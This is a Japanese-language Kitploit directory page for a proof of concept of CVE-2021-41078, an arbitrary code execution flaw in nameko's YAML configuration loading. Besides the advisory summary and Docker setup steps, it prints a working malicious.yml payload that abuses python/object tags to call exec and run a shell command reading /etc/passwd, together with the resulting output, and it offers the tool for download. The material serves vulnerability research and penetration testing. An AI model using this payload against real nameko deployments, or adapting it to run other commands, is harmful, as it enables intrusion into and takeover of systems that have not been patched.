Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41078 — nameko YAMLデシリアライゼーションによる任意のコード実行 | Kitploit
ツール/GitHubGitHub/s-index/cve-2021-41078
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用設定ミス
GitHubs-index/cve-2021-41078

CVE-2021-41078

nameko YAMLデシリアライゼーションによる任意のコード実行

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41078

nameko の YAML デシリアライゼーションによる任意コード実行

NVD の説明

Nameko 2.13.0 以前では、設定ファイルをデシリアライズする際に任意のコード実行が可能になる恐れがあります。

デモ

cve-2021-41078

セットアップ

  1. Dockerfile からイメージをビルドする
root@kitploit:~
docker build -t cve-2021-41078 .
  1. 新しいコンテナで python main.py を実行する
root@kitploit:~
docker run -it --rm cve-2021-41078

出力 /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

PoC ペイロード

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

参照

  • https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g
ツールをダウンロード